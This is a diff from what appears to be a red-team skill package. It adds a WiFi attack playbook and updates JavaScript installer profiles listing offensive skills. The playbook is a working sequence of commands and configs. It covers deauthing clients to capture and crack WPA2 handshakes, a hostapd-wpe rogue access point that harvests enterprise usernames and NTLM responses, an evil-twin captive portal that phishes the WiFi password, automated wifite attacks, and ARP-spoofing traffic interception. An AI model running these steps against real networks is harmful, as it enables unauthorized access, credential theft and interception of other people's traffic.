+airodump-ng -c \$TARGET_CHANNEL --bssid \$TARGET_BSSID -w /tmp/handshake wlan0mon &
+
+# Step 2: Deauth a client to force handshake
+aireplay-ng --deauth 10 -a \$TARGET_BSSID wlan0mon
+sleep 5
+
+# Step 3: Verify capture has handshake
+aircrack-ng /tmp/handshake*.cap | grep 'handshake'
+
+# Step 4: Convert + crack
+hcxpcapngtool -o /tmp/handshake.hash /tmp/handshake*.cap
+hashcat -a 0 -m 22000 /tmp/handshake.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --force
+
+# Step 5: Wordlist generation from SSID (CUPP + cewl)
+cupp -i  # interactive — enter target org info
+cewl https://target.com -m 8 -d 2 > /tmp/target_words.txt
+hashcat -a 0 -m 22000 /tmp/handshake.hash /tmp/target_words.txt --force
+"
+```
+
+---
+
+## Phase 4: WPA2-Enterprise PEAP Downgrade (EAP Harvest)
+
+```bash
+# Capture domain\username + NTLM hash from enterprise WiFi clients
+# Uses hostapd-wpe to intercept MSCHAPv2 challenge-response
+
+docker exec rtexit-kali bash -c "
+# Check if target uses WPA2-Enterprise
+airodump-ng wlan0mon | grep 'WPA2.*EAP\|MGT'
+
+# Set up rogue Enterprise AP
+# 1. Create hostapd-wpe config
+cat > /tmp/hostapd-wpe.conf << 'EOF'
+interface=wlan0
+driver=nl80211
+ssid=CORPORATE-WIFI
+channel=6
+hw_mode=g
+ieee8021x=1
+eap_server=1
+eapol_key_index_workaround=0
+eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
+ca_cert=/etc/hostapd-wpe/certs/ca.pem
+server_cert=/etc/hostapd-wpe/certs/server.pem
+private_key=/etc/hostapd-wpe/certs/server.key
+private_key_passwd=whatever
+dh_file=/etc/hostapd-wpe/certs/dh
+auth_algs=3
+wpa=2
+wpa_key_mgmt=WPA-EAP
+wpa_pairwise=CCMP TKIP
+rsn_pairwise=CCMP
+EOF
+
+# 2. Launch rogue AP + deauth clients from real AP
+hostapd-wpe /tmp/hostapd-wpe.conf &
+
+# Deauth from real Enterprise AP
+aireplay-ng --deauth 5 -a REAL_AP_BSSID wlan0mon
+
+# Captured creds appear in /var/log/hostapd-wpe.log
+tail -f /var/log/hostapd-wpe.log | grep -i 'username\|password\|response'
+"
+```
+
+```bash
+docker exec rtexit-kali bash -c "
+# Crack captured NTLM challenge-response
+# Format: username:domain:challenge:response
+# Use asleap or hashcat mode 5500 (MSCHAPv2)
+
+# asleap method
+asleap -C CHALLENGE_HEX -R RESPONSE_HEX -W /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+
+# hashcat method (mode 5500 = NTLMv1, mode 5600 = NTLMv2)
+echo 'USER:DOMAIN:CHALLENGE:RESPONSE' | hashcat -a 0 -m 5600 - rockyou.txt --force
+"
+```
+
+---
+
+## Phase 5: Evil Twin — WPA2 Personal Credential Phishing
+
+```bash
+docker exec rtexit-kali bash -c "
+# Create fake AP with captive portal asking for WiFi password
+TARGET_SSID='CorpGuest'
+
+# Method: airbase-ng + DNSmasq + Apache captive portal
+airbase-ng -e '\$TARGET_SSID' -c 6 wlan0mon &
+
+# Configure DHCP
+cat > /tmp/dnsmasq.conf << 'EOF'
+interface=at0
+dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
+dhcp-option=3,10.0.0.1
+dhcp-option=6,10.0.0.1
+server=8.8.8.8
+log-queries
+log-dhcp
+address=/#/10.0.0.1
+EOF
+
+ifconfig at0 10.0.0.1 netmask 255.255.255.0
+dnsmasq -C /tmp/dnsmasq.conf
+
+# Captive portal page to harvest PSK
+# Serve a fake 'WiFi login' page on Apache
+# When victim enters PSK → test against handshake capture → if match: real password
+"
+```
+
+---
+
+## Phase 6: wifite2 — Automated All-in-One
+
+```bash
+docker exec rtexit-kali bash -c "
+# wifite2 automates everything: capture + deauth + crack
+
+# Attack all visible networks
+wifite --wpa --pmkid --dict /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+
+# Attack specific target
+wifite -e 'CORP-WIFI' --pmkid --dict /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+
+# WPS attack on vulnerable APs
+wifite --wps-only --no-wpa
+"
+```
+
+---
+
+## Phase 7: Post-Compromise — Traffic Analysis
+
+```bash
+docker exec rtexit-kali bash -c "
+# After cracking WPA2 key — capture all traffic
+# Connect to network then:
+
+# ARP poisoning → MITM all traffic
+bettercap -iface wlan0 -eval '
+  net.probe on
+  sleep 5
+  net.show
+  set arp.spoof.targets 192.168.1.0/24
+  arp.spoof on
+  net.sniff on
+'
+
+# Capture credentials from HTTP
+tcpdump -i wlan0 -w /tmp/wifi_capture.pcap &
+# After capture:
+# PCredz -f /tmp/wifi_capture.pcap
+"
+```
+
+---
+
+## Related Skills
+- `rt-exploit-network` — post-WiFi network exploitation
+- `rt-ssl-mitm` — intercept HTTPS after WiFi access
+- `rt-exploit-physical` — physical access scenarios
+- `rt-redteam-infra` — set up C2 after WiFi access
+
+## References
+- https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
+- https://github.com/ZerBea/hcxdumptool
+- https://attack.mitre.org/techniques/T1465/ — Rogue Wireless Access Point

package/tools/installer/lib/profiles.js

@@ -99,6 +99,7 @@ const PROFILES = {
       'rt-ai-llm-security',
       'rt-crypto-attacks',
       'rt-exploit-fuzzing',
+      'rt-exploit-graphql',
     ],
   },
 
@@ -204,13 +205,14 @@ const PROFILES = {
 
   specialist: {
     label: 'Specialist',
-    description: 'SCADA/ICS, IoT, hardware, physical, social engineering, wireless',
+    description: 'SCADA/ICS, IoT, hardware, physical, social engineering, wireless, WiFi',
     skills: [
       'rt-exploit-scada',
       'rt-exploit-iot',
       'rt-hardware-hacking',
       'rt-exploit-wireless',
       'rt-wireless-rogue-ap',
+      'rt-wifi-attacks',
       'rt-exploit-physical',
       'rt-exploit-phishing',
       'rt-exploit-vishing',
@@ -222,6 +224,36 @@ const PROFILES = {
       'rt-steganography',
     ],
   },
+
+  recon: {
+    label: 'Recon & OSINT',
+    description: 'OSINT, GitHub recon, subdomain enum, attack surface mapping',
+    skills: [
+      'rt-active-recon',
+      'rt-osint',
+      'rt-shodan-recon',
+      'rt-subdomain-enum',
+      'rt-subdomain-takeover',
+      'rt-wordlist-generation',
+      'rt-attack-surface-map',
+      'rt-github-recon',
+      'rt-js-analysis',
+      'rt-password-spray',
+    ],
+  },
+
+  devops: {
+    label: 'DevOps / IaC',
+    description: 'IaC misconfigs, Terraform, K8s YAML, CloudFormation, supply chain',
+    skills: [
+      'rt-iac-misconfig',
+      'rt-supply-chain',
+      'rt-kubernetes',
+      'rt-exploit-containers',
+      'rt-serverless',
+      'rt-github-recon',
+    ],
+  },
 };
 
 /**